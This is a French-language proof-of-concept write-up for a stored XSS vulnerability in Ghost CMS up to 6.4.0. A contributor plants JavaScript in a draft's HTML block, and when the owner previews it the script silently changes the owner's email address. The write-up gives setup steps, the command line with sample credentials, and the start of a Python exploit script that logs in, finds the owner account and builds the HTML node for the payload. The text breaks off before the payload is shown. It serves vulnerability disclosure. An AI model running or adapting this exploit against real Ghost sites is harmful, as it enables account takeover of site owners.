
Ghost CMS Élévation de privilèges PoC
Preuve de concept d'escalade de privilèges Ghost CMS
Dans Ghost Foundation Ghost CMS jusqu'à la version 6.4.0, le bloc HTML dans l'éditeur de brouillon d'article ne nettoie ni n'encode correctement le contenu fourni par l'utilisateur, ce qui entraîne une vulnérabilité de cross-site scripting (XSS) stocké. Un utilisateur disposant des privilèges de contributeur peut injecter du JavaScript arbitraire dans un brouillon, qui s'exécute lorsqu'il est consulté par le compte propriétaire. Cela permet à l'attaquant d'effectuer des actions privilégiées dans le contexte du propriétaire.
Pour démontrer la vulnérabilité, il est nécessaire de configurer une instance locale de Ghost CMS avec deux comptes :
Compte propriétaire - créé automatiquement lors de l'installation de Ghost.
Compte contributeur - créé par le propriétaire en invitant un nouvel utilisateur. Ghost envoie un lien magique à l'adresse e-mail du contributeur pour finaliser la configuration du compte.
Comme cela est effectué localement, un outil de capture d'e-mails tel que MailHog doit être installé (par exemple via Docker). Cela permet d'intercepter localement le lien magique envoyé par Ghost, afin que le contributeur puisse activer lui-même son compte.
Une fois les deux comptes actifs, le script d'exploitation (contributor.py) peut être utilisé. Le script nécessite les identifiants de connexion du contributeur ainsi que la nouvelle adresse e-mail qui sera attribuée au compte propriétaire après une exploitation réussie.
Les paramètres du script sont :
-u / --username Nom d'utilisateur du contributeur (e-mail)
-p / --password Mot de passe du contributeur
-e / --new-email Nouvelle adresse e-mail à définir sur le compte propriétaire
--url URL de l'instance Ghost (optionnel)
Pour exécuter le script dans le terminal, utilisez :
python3 contributor.py -u '[email protected]' -p 'wojtek123!@#' -e '[email protected]'
Lors de l'exécution, le script crée automatiquement un nouveau brouillon d'article contenant la charge utile JavaScript malveillante dans le bloc HTML vulnérable.
Pour déclencher le XSS stocké, le propriétaire doit simplement prévisualiser le brouillon en l'ouvrant dans le panneau d'administration Ghost et en cliquant sur « Aperçu ». Le script injecté s'exécute en arrière-plan avec les privilèges du propriétaire, et le propriétaire n'est pas averti que son adresse e-mail a été modifiée.
import requests
import json
import argparse
class GhostCMSSession:
def __init__(self, ghost_url="http://localhost:2368"):
self.ghost_url = ghost_url.rstrip('/')
self.api_url = f"{self.ghost_url}/ghost/api/admin"
self.session = requests.Session()
self.authenticated = False
self.current_user = None
self.owner_user = None
self.session.headers.update({
'Origin': self.ghost_url,
'Accept': 'application/json',
'Content-Type': 'application/json'
})
def login(self, username, password):
"""Login to Ghost with username and password"""
login_url = f"{self.api_url}/session/"
payload = {"username": username, "password": password}
try:
response = self.session.post(login_url, json=payload)
if response.status_code == 201:
print(f"✓ Successfully logged in as {username}")
self.authenticated = True
self.current_user = self.get_current_user()
self.owner_user = self.get_owner_user()
return True
else:
print(f"✗ Login failed: {response.status_code}")
return False
except Exception as e:
print(f"✗ Login error: {str(e)}")
return False
def get_current_user(self):
"""Get current user information"""
if not self.authenticated:
return None
try:
url = f"{self.api_url}/users/me/?include=roles"
response = self.session.get(url)
if response.status_code == 200:
data = response.json()
user = data['users'][0]
print(f"\n Current User: {user.get('name', 'Unknown')}")
print(f" Email: {user.get('email', 'Unknown')}")
print(f" User ID: {user.get('id', 'Unknown')}")
if 'roles' in user and user['roles']:
role = user['roles'][0]
if isinstance(role, dict):
print(f" Role: {role.get('name', 'Unknown')}")
return user
return None
except Exception as e:
print(f" Error fetching user: {str(e)}")
return None
def get_owner_user(self):
"""Fetch all users and find the owner - return full user object"""
if not self.authenticated:
return None
try:
print(f"\n Fetching all users to find owner...")
url = f"{self.api_url}/users/?include=roles"
response = self.session.get(url)
if response.status_code == 200:
data = response.json()
users = data.get('users', [])
print(f" Found {len(users)} users")
for user in users:
if 'roles' in user and user['roles']:
role = user['roles'][0]
role_name = role.get('name', '').lower() if isinstance(role, dict) else str(role).lower()
print(f" - {user.get('name')} ({user.get('email')}) - Role: {role_name}")
if role_name == 'owner' or role_name == 'administrator':
print(f"\n ✓ Found Owner: {user.get('name')} (ID: {user.get('id')})")
print(f" Slug: {user.get('slug')}")
print(f" Email: {user.get('email')}")
return user
return None
return None
except Exception as e:
print(f" ✗ Error fetching users: {str(e)}")
return None
def create_lexical_with_html(self, html_content):
"""Create Lexical format with HTML node (as a JSON string)"""
lexical_structure = {
"root": {
"children": [
{
"type": "html",
"version": 1,
"html": html_content,
"visibility": {
"web": {
"nonMember": True,
"memberSegment": "status:free,status:-free"
},
"email": {
"memberSegment": "status:free,status:-free"
}
}
},
{
"children": [],
"direction": None,
"format": "",
"indent": 0,
"type": "paragraph",
"version": 1
}
],
"direction": None,
"format": "",
"indent": 0,
"type": "root",
"version": 1
}
}
return json.dumps(lexical_structure)
def create_post_for_review(self, title, new_email, tags=None, excerpt=None):
"""Create a post with Lexical HTML content"""
if not self.authenticated or not self.current_user:
print("✗ Not authenticated")
return None